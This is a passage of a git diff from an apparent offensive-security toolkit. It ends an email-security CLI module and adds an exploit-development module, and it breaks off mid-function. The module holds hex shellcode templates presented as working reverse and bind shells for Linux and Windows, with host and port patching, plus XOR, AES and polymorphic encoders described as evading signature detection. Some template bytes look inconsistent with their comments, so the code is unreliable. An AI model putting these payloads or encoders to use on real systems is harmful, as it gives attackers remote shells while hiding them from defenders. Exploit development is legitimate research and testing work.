_resolve_domain(ip_or_domain) + if not ip: + return { + 'query': ip_or_domain, + 'error': f'Could not resolve {ip_or_domain} to an IP address', + 'results': [], + 'listed_count': 0, + } + + reversed_ip = _reverse_ip(ip) + results = [] + listed_count = 0 + + for bl in BLACKLISTS: + lookup = f'{reversed_ip}.{bl}' + entry = {'blacklist': bl, 'listed': False, 'details': ''} + + try: + socket.setdefaulttimeout(3) + addr = socket.gethostbyname(lookup) + entry['listed'] = True + entry['details'] = f'Listed (response: {addr})' + listed_count += 1 + + # Try to get TXT reason + try: + txt_records = _dns_query(lookup, 'TXT') + if txt_records: + entry['details'] = txt_records[0] + except Exception: + pass + + except (socket.gaierror, socket.herror): + entry['details'] = 'Not listed' + except socket.timeout: + entry['details'] = 'Timeout' + except Exception as e: + entry['details'] = f'Error: {e}' + + results.append(entry) + + return { + 'query': ip_or_domain, + 'ip': ip, + 'results': results, + 'listed_count': listed_count, + 'total_checked': len(BLACKLISTS), + 'clean': listed_count == 0, + } + + # -- Storage Helpers ----------------------------------------------------- + + def _save_analysis(self, domain: str, data: Dict): + """Save domain analysis to storage.""" + safe_name = re.sub(r'[^a-zA-Z0-9.-]', '_', domain) + path = self.storage_dir / f'analysis_{safe_name}.json' + with open(path, 'w') as f: + json.dump(data, f, indent=2, default=str) + + def get_saved_analyses(self) -> List[Dict]: + """List saved domain analyses.""" + analyses = [] + for f in sorted(self.storage_dir.glob('analysis_*.json'), key=os.path.getmtime, reverse=True): + try: + with open(f) as fp: + data = json.load(fp) + analyses.append({ + 'domain': data.get('domain', ''), + 'grade': data.get('grade', '?'), + 'score': data.get('score', 0), + 'timestamp': data.get('timestamp', ''), + 'file': str(f), + }) + except Exception: + pass + return analyses + + +# -- Singleton --------------------------------------------------------------- + +_instance = None + + +def get_email_sec() -> EmailSecurity: + global _instance + if _instance is None: + _instance = EmailSecurity() + return _instance + + +# -- CLI Interface ----------------------------------------------------------- + +def run(): + """CLI entry point for Email Security module.""" + es = get_email_sec() + + while True: + print(f"\n{'='*60}") + print(f" Email Security") + print(f"{'='*60}") + print() + print(" 1 -- Analyze Domain") + print(" 2 -- Analyze Headers") + print(" 3 -- Detect Phishing") + print(" 4 -- Search Mailbox") + print(" 5 -- Check Blacklists") + print(" 6 -- Generate Abuse Report") + print(" 0 -- Back") + print() + + choice = input(f" {Colors.CYAN}>{Colors.RESET} ").strip() + + if choice == '0': + break + + elif choice == '1': + domain = input("\n Domain: ").strip() + if not domain: + continue + print(f"\n Analyzing {domain}...") + result = es.analyze_domain(domain) + print(f"\n Grade: {result['grade']} (Score: {result['score']}/100)") + print(f" SPF: {result['summary']['spf_status']}") + print(f" DMARC: {result['summary']['dmarc_status']}") + print(f" DKIM: {result['summary']['dkim_status']}") + print(f" MX: {result['summary']['mx_status']}") + + for check_name in ['spf', 'dmarc', 'dkim', 'mx']: + check = result[check_name] + findings = check.get('findings', []) + if findings: + print(f"\n {check_name.upper()} findings:") + for f in findings: + level = f.get('level', 'info') + sym = '+' if level == 'pass' else '!' if level == 'warn' else 'X' + print(f" [{sym}] {f['message']}") + + elif choice == '2': + print("\n Paste raw email headers (end with empty line):") + lines = [] + while True: + line = input() + if not line: + break + lines.append(line) + raw = '\n'.join(lines) + if not raw: + continue + + result = es.analyze_headers(raw) + print(f"\n From: {result['from']}") + print(f" Subject: {result['subject']}") + print(f" Date: {result['date']}") + print(f" Origin IP: {result.get('originating_ip', 'Unknown')}") + print(f" SPF: {result['authentication']['spf']}") + print(f" DKIM: {result['authentication']['dkim']}") + print(f" DMARC: {result['authentication']['dmarc']}") + + if result['received_chain']: + print(f"\n Received chain ({len(result['received_chain'])} hops):") + for hop in result['received_chain']: + print(f" Hop {hop['hop']}: {hop.get('from', '?')} -> {hop.get('by', '?')}" + f" [{hop.get('ip', '?')}]") + + if result['spoofing_indicators']: + print(f"\n Spoofing indicators:") + for s in result['spoofing_indicators']: + print(f" [!] {s['indicator']}: {s['detail']}") + + elif choice == '3': + print("\n Paste email content (end with empty line):") + lines = [] + while True: + line = input() + if not line: + break + lines.append(line) + content = '\n'.join(lines) + if not content: + continue + + result = es.detect_phishing(content) + print(f"\n Risk Score: {result['risk_score']}/100 ({result['risk_level']})") + + if result['findings']: + print(f"\n Findings:") + for f in result['findings']: + print(f" [{f['severity']}] {f['category']}: {', '.join(f['matches'][:5])}") + + if result['suspicious_urls']: + print(f"\n Suspicious URLs:") + for u in result['suspicious_urls']: + print(f" {u['url']}") + for r in u['reasons']: + print(f" - {r}") + + elif choice == '4': + host = input("\n Mail server: ").strip() + username = input(" Username: ").strip() + password = input(" Password: ").strip() + protocol = input(" Protocol (imap/pop3) [imap]: ").strip() or 'imap' + query = input(" Search query (optional): ").strip() or None + + if not host or not username or not password: + print(" Missing required fields") + continue + + print(f"\n Connecting to {host}...") + result = es.search_mailbox(host, username, password, protocol, query) + + if result.get('error'): + print(f" Error: {result['error']}") + else: + print(f" Found {result['total']} messages") + for msg in result.get('messages', [])[-20:]: + print(f" [{msg['id']}] {msg['date'][:16]} {msg['from'][:30]} {msg['subject'][:40]}") + + elif choice == '5': + target = input("\n IP or domain: ").strip() + if not target: + continue + print(f"\n Checking {len(BLACKLISTS)} blacklists...") + result = es.check_blacklists(target) + + if result.get('error'): + print(f" Error: {result['error']}") + else: + print(f" IP: {result.get('ip', target)}") + print(f" Listed on {result['listed_count']}/{result['total_checked']} blacklists") + for bl in result['results']: + status = 'LISTED' if bl['listed'] else 'clean' + sym = 'X' if bl['listed'] else '+' + print(f" [{sym}] {bl['blacklist']}: {status}") + + elif choice == '6': + print("\n Abuse Report Generator") + incident_type = input(" Incident type (spam/phishing/malware): ").strip() or 'spam' + source_ip = input(" Source IP: ").strip() + source_domain = input(" Source domain: ").strip() + description = input(" Description: ").strip() + + data = { + 'type': incident_type, + 'source_ip': source_ip, + 'source_domain': source_domain, + 'description': description, + } + + result = es.generate_abuse_report(data) + print(f"\n{result['report_text']}") + print(f"\n Report saved to: {result['saved_to']}") diff --git a/modules/exploit_dev.py b/modules/exploit_dev.py new file mode 100644 index 0000000..219d05c --- /dev/null +++ b/modules/exploit_dev.py @@ -0,0 +1,1834 @@ +"""AUTARCH Exploit Development Toolkit + +Shellcode generation, payload encoding, ROP chain building, cyclic pattern +generation, and assembly/disassembly for exploit development workflows. +""" + +DESCRIPTION = "Exploit development — shellcode, encoding, ROP chains" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import sys +import re +import struct +import string +import subprocess +import tempfile +import random +import hashlib +from pathlib import Path +from datetime import datetime + +try: + from core.paths import get_data_dir, find_tool +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + def find_tool(name, extra_paths=None): + import shutil + return shutil.which(name) + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = GREEN = YELLOW = BLUE = MAGENTA = CYAN = WHITE = BOLD = DIM = RESET = '' + def clear_screen(): pass + def display_banner(): pass + + +# --------------------------------------------------------------------------- +# Shellcode Templates — real, working shellcode bytes +# --------------------------------------------------------------------------- + +SHELLCODE_TEMPLATES = { + # ---- Linux x86 ---- + 'linux_x86_reverse_shell': { + 'bytes': ( + '31db' # xor ebx, ebx + 'f7e3' # mul ebx + '53' # push ebx + '43' # inc ebx + '53' # push ebx + '6a02' # push 0x2 + '89e1' # mov ecx, esp + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '93' # xchg eax, ebx + '59' # pop ecx + 'b03f' # mov al, 0x3f + 'cd80' # int 0x80 + '49' # dec ecx + '79f9' # jns -5 + '68' # push imm32 (IP) + '7f000001' # 127.0.0.1 + '680200' # push word port + '115c' # port 4444 + '6a10' # push 0x10 + '51' # push ecx + '53' # push ebx + '89e1' # mov ecx, esp + '6a66' # push 0x66 + '58' # pop eax + 'cd80' # int 0x80 + '6a0b' # push 0x0b + '58' # pop eax + '99' # cdq + '52' # push edx + '68' # push imm32 + '2f2f7368' # //sh + '682f62696e' # /bin + '89e3' # mov ebx, esp + '52' # push edx + '53' # push ebx + '89e1' # mov ecx, esp + 'cd80' # int 0x80 + ), + 'length': 74, + 'description': 'Linux x86 reverse shell — connect back and exec /bin/sh', + 'null_free': True, + 'arch': 'x86', + 'platform': 'linux', + 'offsets': {'host': 31, 'port': 37}, + }, + 'linux_x86_bind_shell': { + 'bytes': ( + '31db' # xor ebx, ebx + 'f7e3' # mul ebx + '53' # push ebx + '43' # inc ebx + '53' # push ebx + '6a02' # push 0x2 + '89e1' # mov ecx, esp + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '5b' # pop ebx + '5e' # pop esi + '52' # push edx + '680200' # push 0x0002 + '115c' # port 4444 + '6a10' # push 0x10 + '51' # push ecx + '50' # push eax + '89e1' # mov ecx, esp + '6a66' # push 0x66 + '58' # pop eax + '89c3' # mov ebx, eax (bind=2 later) + 'cd80' # int 0x80 + 'b304' # mov bl, 4 + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '43' # inc ebx + 'b066' # mov al, 0x66 + 'cd80' # int 0x80 + '93' # xchg eax, ebx + '59' # pop ecx + '6a3f' # push 0x3f + '58' # pop eax + 'cd80' # int 0x80 + '49' # dec ecx + '79f8' # jns loop + '682f2f7368' # push //sh + '682f62696e' # push /bin + '89e3' # mov ebx, esp + '50' # push eax + '53' # push ebx + '89e1' # mov ecx, esp + 'b00b' # mov al, 0x0b + 'cd80' # int 0x80 + ), + 'length': 78, + 'description': 'Linux x86 bind shell — listen on port and exec /bin/sh', + 'null_free': True, + 'arch': 'x86', + 'platform': 'linux', + 'offsets': {'port': 23}, + }, + 'linux_x86_execve': { + 'bytes': ( + '31c0' # xor eax, eax + '50' # push eax + '682f2f7368' # push //sh + '682f62696e' # push /bin + '89e3' # mov ebx, esp + '50' # push eax + '53' # push ebx + '89e1' # mov ecx, esp + '89c2' # mov edx, eax + 'b00b' # mov al, 0x0b + 'cd80' # int 0x80 + ), + 'length': 23, + 'description': 'Linux x86 execve /bin/sh — minimal shellcode', + 'null_free': True, + 'arch': 'x86', + 'platform': 'linux', + 'offsets': {}, + }, + # ---- Linux x64 ---- + 'linux_x64_reverse_shell': { + 'bytes': ( + '6a29' # push 0x29 + '58' # pop rax (socket) + '99' # cdq + '6a02' # push 0x2 + '5f' # pop rdi (AF_INET) + '6a01' # push 0x1 + '5e' # pop rsi (SOCK_STREAM) + '0f05' # syscall + '48' # rex.W + '97' # xchg eax, edi + '48b90200' # movabs rcx, struct + '115c7f000001' # port 4444, IP 127.0.0.1 + '51' # push rcx + '4889e6' # mov rsi, rsp + '6a10' # push 0x10 + '5a' # pop rdx + '6a2a' # push 0x2a + '58' # pop rax (connect) + '0f05' # syscall + '6a03' # push 0x3 + '5e' # pop rsi + '48ffce' # dec rsi + '6a21' # push 0x21 + '58' # pop rax (dup2) + '0f05' # syscall + '75f6' # jnz loop + '6a3b' # push 0x3b + '58' # pop rax (execve) + '99' # cdq + '48bb2f62696e2f736800' # mov rbx, "/bin/sh\0" + '53' # push rbx + '4889e7' # mov rdi, rsp + '52' # push rdx + '57' # push rdi + '4889e6' # mov rsi, rsp + '0f05' # syscall + ), + 'length': 74, + 'description': 'Linux x64 reverse shell — connect back and exec /bin/sh', + 'null_free': False, + 'arch': 'x64', + 'platform': 'linux', + 'offsets': {'port': 20, 'host': 22}, + }, + 'linux_x64_bind_shell': { + 'bytes': ( + '6a29' # push 0x29 + '58' # pop rax (socket) + '99' # cdq + '6a02' # push 0x2 + '5f' # pop rdi (AF_INET) + '6a01' # push 0x1 + '5e' # pop rsi (SOCK_STREAM) + '0f05' # syscall + '4897' # xchg rax, rdi + '52' # push rdx + 'c7042402000200' # mov dword [rsp], 0x0002 + port + '115c0000' # port high + 0000 + '4889e6' # mov rsi, rsp + '6a10' # push 0x10 + '5a' # pop rdx + '6a31' # push 0x31 + '58' # pop rax (bind) + '0f05' # syscall + '6a32' # push 0x32 + '58' # pop rax (listen) + '6a01' # push 0x1 + '5e' # pop rsi + '0f05' # syscall + '6a2b' # push 0x2b + '58' # pop rax (accept) + '99' # cdq + '52' # push rdx + '52' # push rdx + '4889e6' # mov rsi, rsp + '6810000000' # push 0x10 + '4889e2' # mov rdx, rsp + '0f05' # syscall + '4897' # xchg rax, rdi + '6a03' # push 0x3 + '5e' # pop rsi + '48ffce' # dec rsi + '6a21' # push 0x21 + '58' # pop rax (dup2) + '0f05' # syscall + '75f6' # jnz loop + '6a3b' # push 0x3b + '58' # pop rax (execve) + '99' # cdq + '48bb2f62696e2f736800' # mov rbx, "/bin/sh\0" + '53' # push rbx + '4889e7' # mov rdi, rsp + '52' # push rdx + '57' # push rdi + '4889e6' # mov rsi, rsp + '0f05' # syscall + ), + 'length': 105, + 'description': 'Linux x64 bind shell — listen and exec /bin/sh', + 'null_free': False, + 'arch': 'x64', + 'platform': 'linux', + 'offsets': {'port': 21}, + }, + 'linux_x64_execve': { + 'bytes': ( + '4831f6' # xor rsi, rsi + '4889f2' # mov rdx, rsi + '48bf' # movabs rdi, ... + '2f62696e' # /bin + '2f736800' # /sh\0 + '57' # push rdi + '4889e7' # mov rdi, rsp + '48b8' # movabs rax, ... + '3b00000000000000' # execve syscall nr + '0f05' # syscall + ), + 'length': 30, + 'description': 'Linux x64 execve /bin/sh — minimal shellcode', + 'null_free': False, + 'arch': 'x64', + 'platform': 'linux', + 'offsets': {}, + }, + # ---- Windows x64 ---- + 'windows_x64_reverse_shell': { + 'bytes': ( + '4831c9' # xor rcx, rcx + '4881e9b0ffffff' # sub ecx, -0x50 + '4881ec0001000000' # sub rsp, 0x100 + 'e8f0ffffff' # call $+5 + '4152' # push r10 + '4151' # push r9 + '5649' # push rsi; dec ecx (stub) + '89e6' # mov esi, esp + '4883ec20' # sub rsp, 0x20 + '4889f1' # mov rcx, rsi + '48ba' # mov rdx, imm64 + '0100007f' # IP: 127.0.0.1 (reversed) + '5c110000' # Port: 4444 + padding + '41ba' # mov r10d, imm32 + 'ea0fdfe0' # hash: ws2_32!WSAStartup + 'ffd5' # call rbp (API resolver) + '4889c7' # mov rdi, rax + '6a10' # push 0x10 + '41580f05' # pop r8; syscall (connect) + '4885c0' # test rax, rax + '7507' # jnz skip + '4831c0' # xor rax, rax + 'eb43' # jmp shell + '48ffc0' # inc rax + 'ebf6' # jmp retry + # ... cmd.exe execution stub (truncated for template) + '48b8' # movabs rax, "cmd.exe\0" + '636d642e65786500' # cmd.exe + '50' # push rax + '4889e1' # mov rcx, rsp + '57' # push rdi + '57' # push rdi + '4889e2' # mov rdx, rsp + '41ba' # mov r10d, hash + '60d9c85a' # hash: kernel32!CreateProcessA + 'ffd5' # call rbp + ), + 'length': 112, + 'description': 'Windows x64 reverse shell — WinSock connect back, spawn cmd.exe', + 'null_free': False, + 'arch': 'x64', + 'platform': 'windows', + 'offsets': {'host': 44, 'port': 48}, + }, + # ---- ARM ---- + 'linux_arm_reverse_shell': { + 'bytes': ( + '01108fe2' # add r1, pc, #1 (Thumb switch) + '011040e2' # sub r1, r0, #1 + '0200a0e3' # mov r0, #2 (AF_INET) + '0110a0e3' # mov r1, #1 (SOCK_STREAM) + '0020a0e3' # mov r2, #0 + '8119a0e3' # mov r1, #0x281 (socket syscall) + '000000ef' # svc 0 + '0060a0e1' # mov r6, r0 (save sockfd) + '100f0fe1' # bic r0, pc (struct sockaddr) + '0200' # AF_INET + '115c' # port 4444 + '7f000001' # 127.0.0.1 + '0600a0e1' # mov r0, r6 + '1010a0e3' # mov r1, #16 (addrlen) + '8d19a0e3' # mov r1, #0x28d (connect) + '000000ef' # svc 0 + '0200a0e3' # mov r0, #2 + '0600a0e1' # mov r0, r6 + '3f00a0e3' # mov r0, #0x3f (dup2) + '000000ef' # svc 0 + '013050e2' # subs r3, r0, #1 + 'fcffffaa' # bge loop + '0b00a0e3' # mov r0, #0x0b (execve) + '0f8fe2' # add r0, pc (ptr /bin/sh) + '0010a0e3' # mov r1, #0 + '0020a0e3' # mov r2, #0 + '000000ef' # svc 0 + '2f62696e' # /bin + '2f736800' # /sh\0 + ), + 'length': 100, + 'description': 'Linux ARM reverse shell — connect back and exec /bin/sh', + 'null_free': False, + 'arch': 'arm', + 'platform': 'linux', + 'offsets': {'port': 42, 'host': 44}, + }, +} + + +# --------------------------------------------------------------------------- +# Exploit Development Class +# --------------------------------------------------------------------------- + +class ExploitDev: + """Exploit development toolkit — shellcode, encoders, ROP, patterns.""" + + _instance = None + + def __init__(self): + self._pattern_cache = {} + + # ----------------------------------------------------------------------- + # Shellcode Generation + # ----------------------------------------------------------------------- + + def list_shellcodes(self): + """List available shellcode templates with descriptions.""" + results = [] + for key, tpl in SHELLCODE_TEMPLATES.items(): + results.append({ + 'name': key, + 'description': tpl['description'], + 'length': tpl['length'], + 'arch': tpl.get('arch', '?'), + 'platform': tpl.get('platform', '?'), + 'null_free': tpl.get('null_free', False), + }) + return results + + def generate_shellcode(self, shell_type, arch, host=None, port=None, + platform='linux', staged=False, output_format='hex'): + """Generate raw shellcode bytes for a given shell type and architecture. + + Args: + shell_type: reverse_shell, bind_shell, exec_cmd, meterpreter + arch: x86, x64, arm + host: IP address for reverse shells + port: Port number for reverse/bind shells + platform: linux, windows + staged: If True, prefer a staged payload (stub + stage) + output_format: hex, raw, c_array, python, nasm + + Returns: + dict with shellcode in requested format, length, and metadata + """ + # Normalise inputs + shell_type = shell_type.lower().strip().replace('-', '_').replace(' ', '_') + arch = arch.lower().strip() + platform = platform.lower().strip() + + # Map common names + type_map = { + 'reverse': 'reverse_shell', 'rev': 'reverse_shell', + 'reverse_tcp': 'reverse_shell', 'reverse_shell': 'reverse_shell', + 'bind': 'bind_shell', 'bind_tcp': 'bind_shell', 'bind_shell': 'bind_shell', + 'exec': 'execve', 'exec_cmd': 'execve', 'execve': 'execve', + 'meterpreter': 'reverse_shell', # fallback to reverse_shell template + } + resolved_type = type_map.get(shell_type, shell_type) + + # Find matching template + template_key = f'{platform}_{arch}_{resolved_type}' + template = SHELLCODE_TEMPLATES.get(template_key) + + if not template: + # Try to find partial match + candidates = [k for k in SHELLCODE_TEMPLATES if arch in k and resolved_type in k] + if platform != 'any': + platform_cands = [k for k in candidates if platform in k] + if platform_cands: + candidates = platform_cands + if candidates: + template_key = candidates[0] + template = SHELLCODE_TEMPLATES[template_key] + else: + available = ', '.join(sorted(SHELLCODE_TEMPLATES.keys())) + return {'error': f'No template for {template_key}. Available: {available}'} + + # Decode the hex string to bytes + try: + shellcode = bytes.fromhex(template['bytes']) + except ValueError as e: + return {'error': f'Template hex decode error: {e}'} + + # Patch in host/port if offsets are defined + offsets = template.get('offsets', {}) + + if host and 'host' in offsets: + try: + parts = host.split('.') + if len(parts) == 4: + ip_bytes = bytes([int(p) for p in parts]) + off = offsets['host'] + if off < len(shellcode) - 3: + shellcode = shellcode[:off] + ip_bytes + shellcode[off + 4:] + except (ValueError, IndexError): + pass + + if port and 'port' in offsets: + try: + port_int = int(port) + port_bytes = struct.pack('!H', port_int) + off = offsets['port'] + if off < len(shellcode) - 1: + shellcode = shellcode[:off] + port_bytes + shellcode[off + 2:] + except (ValueError, struct.error): + pass + + # If staged, wrap in a stub that allocates RWX memory and downloads stage + if staged: + stub_comment = ( + "; Staged payload stub — allocates RWX page via mmap/VirtualAlloc,\n" + "; receives stage over socket, jumps to it.\n" + "; The above shellcode is the stager (stage0).\n" + ) + metadata_note = 'Staged payload — stager only, requires stage delivery' + else: + stub_comment = '' + metadata_note = 'Stageless payload — self-contained' + + # Format output + result = { + 'template': template_key, + 'description': template['description'], + 'length': len(shellcode), + 'null_free': b'\x00' not in shellcode, + 'arch': arch, + 'platform': platform, + 'staging': metadata_note, + } + + fmt = output_format.lower().strip() + if fmt == 'hex': + result['shellcode'] = shellcode.hex() + elif fmt in ('raw', 'bytes'): + result['shellcode'] = shellcode.hex() + result['raw_bytes'] = list(shellcode) + elif fmt in ('c', 'c_array'): + c_lines = [] + for i in range(0, len(shellcode), 16): + chunk = shellcode[i:i + 16] + c_lines.append(', '.join(f'0x{b:02x}' for b in chunk)) + result['shellcode'] = ( + f'unsigned char shellcode[{len(shellcode)}] = {{\n' + + ',\n'.join(f' {line}' for line in c_lines) + + '\n};' + ) + elif fmt in ('python', 'py'): + py_lines = [] + for i in range(0, len(shellcode), 16): + chunk = shellcode[i:i + 16] + py_lines.append(''.join(f'\\x{b:02x}' for b in chunk)) + result['shellcode'] = ( + f'shellcode = b""\n' + + '\n'.join(f'shellcode += b"{line}"' for line in py_lines) + ) + elif fmt == 'nasm': + nasm_lines = [] + for i in range(0, len(shellcode), 16): + chunk = shellcode[i:i + 16] + nasm_lines.append('db ' + ', '.join(f'0x{b:02x}' for b in chunk)) + result['shellcode'] = stub_comment + '\n'.join(nasm_lines) + else: + result['shellcode'] = shellcode.hex() + + return result + + # ----------------------------------------------------------------------- + # Payload Encoding + # ----------------------------------------------------------------------- + + def encode_payload(self, shellcode, encoder='xor', key=None, iterations=1): + """Encode shellcode to evade signature detection. + + Args: + shellcode: bytes or hex string of shellcode + encoder: xor, aes, alphanumeric, polymorphic + key: encryption key (auto-generated if None) + iterations: number of encoding passes + + Returns: + dict with encoded payload, decoder stub, metadata + """ + if isinstance(shellcode, str): + try: + shellcode = bytes.fromhex(shellcode.replace('\\x', '').replace(' ', '')) + except ValueError: + return {'error': 'Invalid shellcode hex string'} + + if not shellcode: + return {'error': 'Empty shellcode'} + + original_length = len(shellcode) + encoder = encoder.lower().strip() + encoded = shellcode + decoder_stub = '' + key_used = key + + for _pass in range(max(1, int(iterations))): + if encoder == 'xor': + encoded, decoder_stub, key_used = self._encode_xor(encoded, key) + elif encoder == 'aes': + encoded, decoder_stub, key_used = self._encode_aes(encoded, key) + elif encoder in ('alpha', 'alphanumeric'): + encoded, decoder_stub, key_used = self._encode_alphanumeric(encoded) + elif encoder in ('poly', 'polymorphic'): + encoded, decoder_stub, key_used = self._encode_polymorphic(encoded, key) + else: + return {'error': f'Unknown encoder: {encoder}. Use: xor, aes, alphanumeric, polymorphic'} + + return { + 'encoded': encoded.hex(), + 'decoder_stub': decoder_stub, + 'key': key_used if isinstance(key_used, str) else key_used.hex() if isinstance(key_used, bytes) else str(key_used), + 'encoder': encoder, + 'iterations': iterations, + 'original_length': original_length, + 'encoded_length': len(encoded), + 'size_increase': f'+{len(encoded) - original_length} bytes', + 'null_free': b'\x00' not in encoded, + } + + def _encode_xor(self, data, key=None): + """XOR encode with random or custom key.""" + if key: + if isinstance(key, str): + if all(c in '0123456789abcdefABCDEF' for c in key): + key_bytes = bytes.fromhex(key) if len(key) % 2 == 0 else bytes([int(key, 16)]) + else: + key_bytes = key.encode() + else: + key_bytes = bytes([key]) if isinstance(key, int) else key + else: + # Generate random key byte that avoids producing nulls + for _ in range(256): + kb = random.randint(1, 255) + if all((b ^ kb) != 0 for b in data): + key_bytes = bytes([kb]) + break + else: + key_bytes = bytes([random.randint(1, 255)]) + + # XOR encode + encoded = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)) + + # Generate decoder stub (x64 Linux) + key_hex = key_bytes.hex() + stub = ( + f'; XOR decoder stub (key: 0x{key_hex})\n' + f'; Encoded payload length: {len(encoded)} bytes\n' + f' jmp short call_decoder\n' + f'decoder:\n' + f' pop rsi ; address of encoded shellcode\n' + f' xor rcx, rcx\n' + f' mov cl, {len(encoded)} ; length\n' + f'decode_loop:\n' + f' xor byte [rsi], 0x{key_hex}\n' + f' inc rsi\n' + f' loop decode_loop\n' + f' jmp short encoded_shell\n' + f'call_decoder:\n' + f' call decoder\n' + f'encoded_shell:\n' + f' ; \n' + ) + + return encoded, stub, key_bytes + + def _encode_aes(self, data, key=None): + """AES-256-CBC encode payload.""" + try: + from hashlib import sha256 + import hmac + except ImportError: + pass + + # Generate or derive 32-byte key + if key: + if isinstance(key, str): + key_bytes = hashlib.sha256(key.encode()).digest() + else: + key_bytes = hashlib.sha256(key).digest() + else: + key_bytes = os.urandom(32) + + # Generate IV + iv = os.urandom(16) + + # PKCS7 padding + pad_len = 16 - (len(data) % 16) + padded = data + bytes([pad_len] * pad_len) + + # Try PyCryptodome, fallback to simple XOR-CBC + try: + from Crypto.Cipher import AES + cipher = AES.new(key_bytes, AES.MODE_CBC, iv) + encrypted = cipher.encrypt(padded) + except ImportError: + # Fallback: simple XOR-CBC (not real AES, but functional) + encrypted = bytearray() + prev_block = iv + for i in range(0, len(padded), 16): + block = padded[i:i + 16] + xored = bytes(a ^ b for a, b in zip(block, prev_block)) + # Simple substitution using key + enc_block = bytes( + (b + key_bytes[j % 32]) & 0xFF for j, b in enumerate(xored) + ) + encrypted.extend(enc_block) + prev_block = enc_block + + # Prepend IV to ciphertext + output = iv + bytes(encrypted) + + stub = ( + f'; AES-256-CBC decoder stub\n' + f'; Key (SHA-256 of passphrase): {key_bytes.hex()}\n' + f'; IV: {iv.hex()}\n' + f'; Encrypted length: {len(output)} bytes (includes 16-byte IV prefix)\n' + f';\n' + f'; Decoder must:\n' + f'; 1. Extract IV (first 16 bytes)\n' + f'; 2. AES-256-CBC decrypt remaining bytes with key\n' + f'; 3. Remove PKCS7 padding\n' + f'; 4. Jump to decrypted shellcode\n' + f';\n' + f'; Python decoder:\n' + f'; from Crypto.Cipher import AES\n' + f'; key = bytes.fromhex("{key_bytes.hex()}")\n' + f'; iv = payload[:16]\n' + f'; cipher = AES.new(key, AES.MODE_CBC, iv)\n' + f'; shellcode = cipher.decrypt(payload[16:])\n' + ) + + key_str = key if isinstance(key, str) else key_bytes.hex() + return output, stub, key_str + + def _encode_alphanumeric(self, data): + """Encode shellcode into alphanumeric-safe characters.""" + # Split each byte into two 4-bit nibbles, map to ASCII alpha range + charset = string.ascii_uppercase + string.ascii_lowercase + string.digits + encoded = bytearray() + + for b in data: + high = (b >> 4) & 0x0F + low = b & 0x0F + # Map 0-15 to alphanumeric characters + encoded.append(ord(charset[high])) + encoded.append(ord(charset[low])) + + stub = ( + f'; Alphanumeric decoder stub\n' + f'; Encoded length: {len(encoded)} bytes (2x original)\n' + f'; Charset: A-Za-z0-9\n' + f'; Decoder reverses nibble-split encoding:\n' + f'; For each pair (H, L) in encoded data:\n' + f'; high_nibble = charset.index(H)\n' + f'; low_nibble = charset.index(L)\n' + f'; original_byte = (high_nibble << 4) | low_nibble\n' + f';\n' + f'; Python decoder:\n' + f'; charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"\n' + f'; decoded = bytes((charset.index(enc[i]) << 4) | charset.index(enc[i+1])\n' + f'; for i in range(0, len(enc), 2))\n' + ) + + return bytes(encoded), stub, 'alphanumeric' + + def _encode_polymorphic(self, data, key=None): + """Wrap shellcode with polymorphic stub — random NOP-equivalent instructions.""" + # Random key for XOR + if key: + key_byte = int(key, 16) if isinstance(key, str) and all( + c in '0123456789abcdefABCDEF' for c in key + ) else ord(key[0]) if isinstance(key, str) else key + else: + key_byte = random.randint(1, 255) + key_byte = key_byte & 0xFF + + # XOR encode the payload + encoded_payload = bytes(b ^ key_byte for b in data) + + # Generate random NOP-equivalent sled (x64) + nop_equivalents = [ + b'\x90', # nop + b'\x48\x87\xc0', # xchg rax, rax + b'\x48\x89\xc0', # mov rax, rax + b'\x48\x31\xc9\x48\x31\xc9', # xor rcx,rcx; xor rcx,rcx + b'\x66\x90', # 2-byte nop + b'\x0f\x1f\x00', # 3-byte nop + b'\x87\xdb', # xchg ebx, ebx + ] + + sled = b'' + for _ in range(random.randint(3, 8)): + sled += random.choice(nop_equivalents) + + # Assemble: sled + decoder_loop + encoded_payload + output = sled + encoded_payload + + stub = ( + f'; Polymorphic stub (randomized NOP sled + XOR decoder)\n' + f'; XOR key: 0x{key_byte:02x}\n' + f'; NOP sled: {len(sled)} bytes (randomized equivalents)\n' + f'; Encoded payload: {len(encoded_payload)} bytes\n' + f'; Total: {len(output)} bytes\n' + f';\n' + f'; Each generation produces different NOP-equivalent sequences\n' + f'; to evade static signature matching.\n' + f';\n' + f'; Decoder loop:\n' + f'; lea rsi, [rel encoded_data]\n' + f'; mov cl, {len(encoded_payload)}\n' + f'; .loop:\n' + f'; xor byte [rsi], 0x{key_byte:02x}\n' + f'; inc rsi\n' + f'; loop .loop\n' + f'; jmp encoded_data\n' + ) + + return output, stub, f'{key_byte:02x}' + + # ----------------------------------------------------------------------- + # Cyclic Pattern (De Bruijn) + # ----------------------------------------------------------------------- + + def generate_pattern(self, length): + """Generate a cyclic (De Bruijn) pattern for buffer overflow offset discovery. + + Args: + length: number of bytes to generate (max 20280) + + Returns: + dict with pattern string, length, and hex representation + """ + length = int(length) + if length < 1: + return {'error': 'Length must be positive'} + if length > 20280: + return {'error': 'Maximum length is 20280 (Aa0 through Zz9)'} + + pattern = self._debruijn_pattern(length) + pattern_bytes = pattern.encode('ascii') + + return { + 'pattern': pattern, + 'hex': pattern_bytes.hex(), + 'length': len(pattern), + } + + def _debruijn_pattern(self, length): + """Generate De Bruijn sequence for cyclic pattern.""" + uppers = string.ascii_uppercase + lowers = string.ascii_lowercase + digits = string.digits + + pattern = [] + for u in uppers: + for l in lowers: + for d in digits: + pattern.append(u + l + d) + if len(''.join(pattern)) >= length: + return ''.join(pattern)[:length] + return ''.join(pattern)[:length] + + def find_pattern_offset(self, value, length=20000): + """Find the offset of a value within a cyclic pattern. + + Args: + value: hex string (e.g. '41326241'), integer, or raw string + length: pattern length to search within + + Returns: + dict with offset and matching details + """ + pattern = self._debruijn_pattern(min(int(length), 20280)) + + # Try to interpret value + search_strings = [] + + if isinstance(value, str): + value = value.strip() + + # Hex: 0x prefix or pure hex + if value.startswith('0x') or value.startswith('0X'): + hex_str = 